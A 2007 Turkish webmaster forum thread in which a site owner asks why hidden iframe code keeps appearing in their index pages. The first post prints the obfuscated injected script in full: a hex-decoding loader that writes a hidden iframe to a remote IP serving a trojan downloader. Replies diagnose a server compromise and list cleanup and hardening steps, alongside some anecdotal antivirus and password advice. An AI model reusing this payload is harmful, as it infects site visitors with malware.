Webmaster Forumu

Geri git   Webmaster Forumu > Webmaster Kaynak Eğitim Tanıtım Hizmet > Virus Spyware Spam

Virus Spyware Spam Virus spyware spam phishing

Cevapla
 
LinkBack Seçenekler Stil
  #1 (permalink)   iTrader 
Alt 2007-12-16, 18:50
mircalem - ait Kullanıcı Resmi (Avatar)
Member
 
Üyelik tarihi: Jan 2006
Mesajlar: 331
Tecrübe Puanı: 2
iTrader: %100/10
mircalem is an unknown quantity at this point
Standart Bu Nasıl Bir Trojan!!!

Arkadaşlar web sayfamda kendilinden iframe şeklinde kodlar ekleniyor. sabah siliyorum 3 4 saat sonra bakıyorum gene eklenmiş sayfada java lı toplist olarak sadece webservis var. bu beladan nasıl kurtulabilirim. kodu ekliyorum

HTML-Kodu:
<BODY bottomMargin=0 leftMargin=0 topMargin=0 rightMargin=0><iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v476512d734cd4(v476512d7354cf){ var v476512d735cc6=16; return(parseInt(v476512d7354cf,v476512d735cc6));}function v476512d7369c9(v476512d736cb9){ function v476512d737904 () {var v476512d737cac=2; return v476512d737cac;} var v476512d7370b2='';for(v476512d7374af=0; v476512d7374af<v476512d736cb9.length; v476512d7374af+=v476512d737904()){ v476512d7370b2+=(String.fromCharCode(v476512d734cd4(v476512d736cb9.substr(v476512d7374af, v476512d737904()))));}return v476512d7370b2;} document.write(v476512d7369c9('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3934207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3635313930292B2739333539303336323263325C272077696474683D313539206865696768743D343130207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
Alıntı ile Cevapla

  #2 (permalink)   iTrader 
Alt 2007-12-16, 19:03
nokie - ait Kullanıcı Resmi (Avatar)
Senior Member
 
Üyelik tarihi: Mar 2005
Nerden: pompano beach
Mesajlar: 714
Blog Entries: 2
Tecrübe Puanı: 3
iTrader: %0/0
nokie will become famous soon enough
Standart

bu kodu derhal o sayfadan kaldır, ziyaretçilerine trojan download ettiriyor başka bir serverdan, biri serverına erişmiş.

malware bu, serverındaki tüm index.* adlı dosyaları otomatik yerleştiriyor kendini.

serverını olası exploitlere karşı tarama yap, /dev/shm, /tmp, /usr/local/apache/proxy , /var/spool, /var/tmp dizinlerine perl script olarak bulaşıyor.

ayrıca bilgisayarınıda full virüs taramasından geçirmeni tavsiye ederim, kullandığın web editörlerine kadar bulaştırıyor kendini (notepad, ultraedit, dreamweaver v.b.) dosyayı kaydet dediğinde sayfanın en altına ekleniyor kod otomatik.

Yapacağın işlemler:

1. Serverına eriş, /dev/shm, /tmp, /usr/local/apache/proxy , /var/spool, /var/tmp dizinlerini korumaya al ve dizinler içindeki olası exploitleri tespit edip temizle.

2. Site için klasör ve dosya yazma izinlerini kontrol et (chmod 0777 olmamalı)

3. Siteye ait ftp şifresini değiştir.

4. Serverda bulunan tüm index adlı dosyalardan trojan javascript kodunu temizle.

5. Kodun bulunduğu siteye girdiysen bilgisayarını full antivirüs taraması yaptır, bilgisayarına bulaşan malware'i temizle.

6. php_safe_mode aktif et.

7. sitende klasöre yazma ihtiyacı duyan yazılımlar varsa, klasörleri dışardan erişilmeyen bir yere taşı (public_html dışına, script yine çalışır) bu sayede chmod0777 guvenle kullanabilirsin.

8. siten için tüm alt klasörleri sh, .pl, cgi v.b. dosyalarının dışardan çalıştırılmaya kapat, htaccess ile bunu yapabilirsin.

9. server root ve normal kullanıcı şifrelerini değiştir.

10. son olarak serverını bütüyle elegeçirmiş olabileceğini düşünüyorsan bir sistem yöneticisine başvur.

Konu nokie tarafından (2007-12-16 Saat 19:06 ) değiştirilmiştir..
Alıntı ile Cevapla

  #3 (permalink)   iTrader 
Alt 2007-12-16, 19:16
Loi - ait Kullanıcı Resmi (Avatar)
Loi Loi isimli üye çevrimiçidir (Online)
Dumuratör
 
Üyelik tarihi: Nov 2006
Nerden: localhost
Mesajlar: 2.205
Blog Entries: 2
Tecrübe Puanı: 4
iTrader: %100/4
Loi has a spectacular aura aboutLoi has a spectacular aura about
Standart

Kaspersky ne bu dosyalari bilgisayariniza bulastiriyor nede bunlardan geriye birsey birakiyor. Kaspersky kullaniniz.
__________________
Wipe çektim sevdalara..
Alıntı ile Cevapla

  #4 (permalink)   iTrader 
Alt 2007-12-16, 19:54
mircalem - ait Kullanıcı Resmi (Avatar)
Member
 
Üyelik tarihi: Jan 2006
Mesajlar: 331
Tecrübe Puanı: 2
iTrader: %100/10
mircalem is an unknown quantity at this point
Standart

tşk ederim arkadaşım hostcuya ileticem bunları benim bilgisayarımda böle bişey yok tüm indexleri kotrol ettim ama sunucuya attımda 2 saat sonra indexte kendilinden ekli görüyom kodu. sanırım sunucuda var bu hostcuya durumu anlatayım. saol
Alıntı ile Cevapla

  #5 (permalink)   iTrader 
Alt 2007-12-16, 20:31
Loi - ait Kullanıcı Resmi (Avatar)
Loi Loi isimli üye çevrimiçidir (Online)
Dumuratör
 
Üyelik tarihi: Nov 2006
Nerden: localhost
Mesajlar: 2.205
Blog Entries: 2
Tecrübe Puanı: 4
iTrader: %100/4
Loi has a spectacular aura aboutLoi has a spectacular aura about
Standart

Alıntı:
mircalem´isimli üyeden Alıntı Mesajı göster
tşk ederim arkadaşım hostcuya ileticem bunları benim bilgisayarımda böle bişey yok tüm indexleri kotrol ettim ama sunucuya attımda 2 saat sonra indexte kendilinden ekli görüyom kodu. sanırım sunucuda var bu hostcuya durumu anlatayım. saol
Zaten sende var oldugu gozukmuyor(ama var) Hostcundan once kendi bilgisayarini duzeltmelisin.
__________________
Wipe çektim sevdalara..
Alıntı ile Cevapla

  #6 (permalink)   iTrader 
Alt 2007-12-19, 04:09
mathiaxbars - ait Kullanıcı Resmi (Avatar)
üseniyorum öyleyse yarın
 
Üyelik tarihi: Jul 2006
Mesajlar: 4.626
Tecrübe Puanı: 6
iTrader: %100/2
mathiaxbars has a spectacular aura aboutmathiaxbars has a spectacular aura about
Standart

bilgisayarındaki dosyalarda olmadığına eminmisin eğer bildiğim şeyse bu virüs zipteki dosyyaların hariç bütün sayfalara iframe kodları atıyor değilse yeni bir şey galiba
__________________
iddaa
Alıntı ile Cevapla

  #7 (permalink)   iTrader 
Alt 2007-12-19, 08:43
nokie - ait Kullanıcı Resmi (Avatar)
Senior Member
 
Üyelik tarihi: Mar 2005
Nerden: pompano beach
Mesajlar: 714
Blog Entries: 2
Tecrübe Puanı: 3
iTrader: %0/0
nokie will become famous soon enough
Standart

Alıntı:
mircalem´isimli üyeden Alıntı Mesajı göster
tşk ederim arkadaşım hostcuya ileticem bunları benim bilgisayarımda böle bişey yok tüm indexleri kotrol ettim ama sunucuya attımda 2 saat sonra indexte kendilinden ekli görüyom kodu. sanırım sunucuda var bu hostcuya durumu anlatayım. saol
servera yerleştiğinden zamanlama olarak belli bir süre zarfında sunucuda bulunan tüm hesaplardaki index.* adlı dosyalara kodu ekliyor otomatik.

sunucu sahibi exploiti temizlemesi gerek makineden.
Alıntı ile Cevapla

  #8 (permalink)   iTrader 
Alt 2007-12-19, 10:44
Member
 
Üyelik tarihi: Nov 2007
Mesajlar: 216
Tecrübe Puanı: 1
iTrader: %0/0
ogranver is an unknown quantity at this point
Standart

Evet benim başımada gelişti. Birçok arkadaş bilir ve beni onlar uyardı. Kaspersky kullanmıyordum. Diğerlerinde de sorun yoktu. Bilgisayarım temizdi fakat sanırsam bir internet hırsızı (Hacker) dadanmış. Şimdi 1 saatte bir şifre yeniliyorum.

Sende eğer bu konuda bir hackerdan şüphe ediyorsan hemen şifreleri değiştir ve hosting firmanla temasa geç.

Saygılarımla;
Oğuzhan FELEK
Alıntı ile Cevapla

  #9 (permalink)   iTrader 
Alt 2007-12-23, 18:59
Ece - ait Kullanıcı Resmi (Avatar)
Ece Ece isimli üyemiz çevrimdışıdır. (Offline)
Gold Member
 
Üyelik tarihi: Mar 2007
Nerden: Ankara
Mesajlar: 1.129
Tecrübe Puanı: 3
iTrader: %100/4
Ece will become famous soon enough
Standart

Bu vürüs trojen hemen hemen çok sitelerde çıkmaya başladı birileri ilginç bir şekilde trojen yayıyor. Genelde yeni başlıyan veya güvendigi siteye girdiginde başına gelen birşey ben 3 gün içinde 19 trojen leptop da 11 vürüs masa üstü bilgisayarımda rast geldim loi nin dedigi kaspersky programını kullanın bulup siliyor. Fakat her yere fazla güvenmeyin artık derim.
Alıntı ile Cevapla

  #10 (permalink)   iTrader 
Alt 2007-12-24, 01:33
Member
 
Üyelik tarihi: Nov 2007
Mesajlar: 216
Tecrübe Puanı: 1
iTrader: %0/0
ogranver is an unknown quantity at this point
Standart

Evet doğru söylüyorsun, benim de başımdan geçti açıkçası. Zor kurtuldum ama her an olacakmış gibi de tetikteyim. Şifrelere dikkat edin bence. Tahminen 2 saatten önce çözülmüyor kısa şifreler. Bu yüzden uzun şifre kullanın ve mutlaka günlük değiştirin.

Kaspersky kullanmanızı tavsiye ederim. Diğerlerinde pek gözükmüyor çünkü. Bende kullanmıyordum ama kullanmaya başlayınca anladım zaten trojanı.

Tüm arkadaşlara iyi çalışmalar dilerim...
Alıntı ile Cevapla

Cevapla

Seçenekler
Stil


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
208.66.194.242 - Trojan Downloader Loi Virus Spyware Spam 3 2007-11-25 02:49
Trojan Horses Detected by (WHM) on ... sverdlow Güvenlik 4 2006-06-07 19:58
Kara Liste [ Trojan vs. ] Aforizmalar Webmaster Genel Konular 3 2005-03-21 20:31


Bütün Zaman Ayarları WEZ +2 olarak düzenlenmiştir. Şu Anki Saat: 18:45 .


Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.2.0

Firefox